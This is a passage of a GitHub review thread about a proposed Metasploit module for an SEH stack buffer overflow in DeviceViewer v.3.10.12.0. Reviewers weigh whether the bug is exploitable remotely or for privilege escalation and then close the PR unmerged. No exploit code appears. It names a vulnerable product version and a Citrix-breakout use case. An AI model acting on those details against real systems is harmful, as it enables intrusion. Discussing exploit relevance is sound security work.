@VoidSec Been trying to look at how to make this a remote bug. See my comments above r.e open ports and similar. At the moment I have not been able to find a way to make this either a LPE exploit nor a remote exploit given lack of knowledge on whats running on those exposed ports as well as the fact that the application runs in the context of a user's session and one user cannot interact with the program running under another user's account, at least not the best of my knowledge.

Will probably need to understand those UDP ports more to evaluate what they are doing, just haven't gotten around to doing that yet due to other commitments taking up my time.

2020-05-11 16:02 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
@VoidSec Also as for the video: unfortunately without any further evidence I'm having a hard time justifying merging this in right now as it doesn't seem to be kiosk software and it also doesn't give one any additional privileges beyond what they already have.

Having the ability to trigger this remotely or to some how elevate privileges locally would tip this in favor of something that we could merge though.

2020-05-11 16:03 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforce ASLR and DEP automatically on default configuration)
Confirmed resolved. Closing

2020-05-11 16:04 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0  Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforce ASLR and DEP automatically on default configuration)
Confirmed resolved.

2020-05-11 16:08 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
Confirmed fixed, marking as resolved :)

2020-05-11 16:51 UTC, ccondon-r7 commented
Hey @VoidSec, thanks so much for all your hard work developing this and addressing feedback! This has been an interesting one for us—since both the CNA and the vendor rejected the CVE, we took a closer look than we might have normally. From what we can tell, it doesn't seem like the module gives a user any additional privileges or access beyond what the user already has, so I think in this case we're going to close it. That said, please don't take it as lack of appreciation for the work you put into this; we'd love to work with you on future contributions!

2020-05-11 16:51 UTC, closed without merging

2020-05-12 07:15 UTC, bcoles commented
> 
> 
> Hey @VoidSec, thanks so much for all your hard work developing this and addressing feedback! This has been an interesting one for us—since both the CNA and the vendor rejected the CVE, we took a closer look than we might have normally. From what we can tell, it doesn't seem like the module gives a user any additional privileges or access beyond what the user already has, so I think in this case we're going to close it. That said, please don't take it as lack of appreciation for the work you put into this; we'd love to work with you on future contributions!

This is an odd line of reasoning. Surely the reason for rejecting this PR was due to a judgement call over accepting, supporting and maintaining copy/paste style exploits, rather than anything to do with CVE ?

Exploitation clearly results in code execution (presuming Hayden Wright and Void_Sec are being honest).

Personally, I agree with the outcome, but the reason for rejection should be clear.

These kind of exploits show up on Exploit DB frequently. There's a reason they don't end up in the Framework. Exploitation of these types of vulnerabilities is usually useful only as a learning exercise or entertainment. However, they can also be used as a breakout from restricted environments such as Citrix. This is a very narrow use case, but a valid use case none the less. Similarly, the extremely unlikely scenario of exploitation via "here, paste this" social engineering is a possibility.

If we do not wish to accept, maintain, and support this style of exploit, that should be made clear to prevent future wasted effort.

2020-05-12 12:36 UTC, ccondon-r7 commented
Howdy @bcoles, we evaluate every PR on its own merit, as you probably already know, and most of the time code testing happens parallel to analysis of the vulnerability itself. If the real-world value of the module isn't immediately clear, we'll often try to figure out a better implementation based on root cause analysis of the bug. In this case, neither approach yielded results, despite quite a bit of back and forth between Metasploit developers and the contributor, whose patience and assistance we greatly appreciate. 

I haven't personally considered blanket-rejecting a class of exploits, though I have my own biases. Others may have, but as far as I know we haven't jumped at that, and I don't necessarily intend to now.

2020-05-12 15:20 UTC, gwillcox-r7 commented
> Personally, I agree with the outcome, but the reason for rejection should be clear.

Hello @bcoles, the judgement call was ultimately made that since this software is not designed to operate in a kiosk environment, according to its installation guide for the newer version(SRICAM CMS) available at http://www.sricam.com/download/id/128545e0009f4d488e813c3330545dcf.html, that we could not find a use case **where this would be part of a normal setup and installation of this software**. 

As I'm sure you are aware people can set up the software however they like, however Metasploit isn't accountable for handling all of the various edge cases by which someone might install a piece of software and in this case the decision was ultimately made to not merge the PR on this basis.

Please be aware that I did work with @VoidSec to try and make this PR better and I explained to him on at least 3 separate occasions that I wasn't sure about merging this due to the fact that I had concerns about the fact that the kiosk scenario that he quoted might not be a default install.

As for why this issue was not closed earlier, again I was working with him on this whilst also testing it so as per @ccondon-r7's comment there was a lot of review then more testing, etc.  Also our general policy is not to close PRs until we are absolutely sure that we cannot merge it, so I wanted to give @VoidSec  a chance to explain if there were any circumstances that might allow us to still consider merging this. This was asked several times however we were not able to obtain any additional details that might allow us to reconsider our stance.

Finally as explained to @VoidSec we are not against merging this entirely, we just believe that given its extremely limited used cases, we would like to see this converted either into a local privilege elevation or a remote code execution bug, both of which would be more applicable to a default setup, before we could merge this in.

I would advise reviewing the comments on this PR if you have any further questions or need more context as to what work was/was not performed. Hopefully this along with @ccatalan-r7's explanation should clear things up.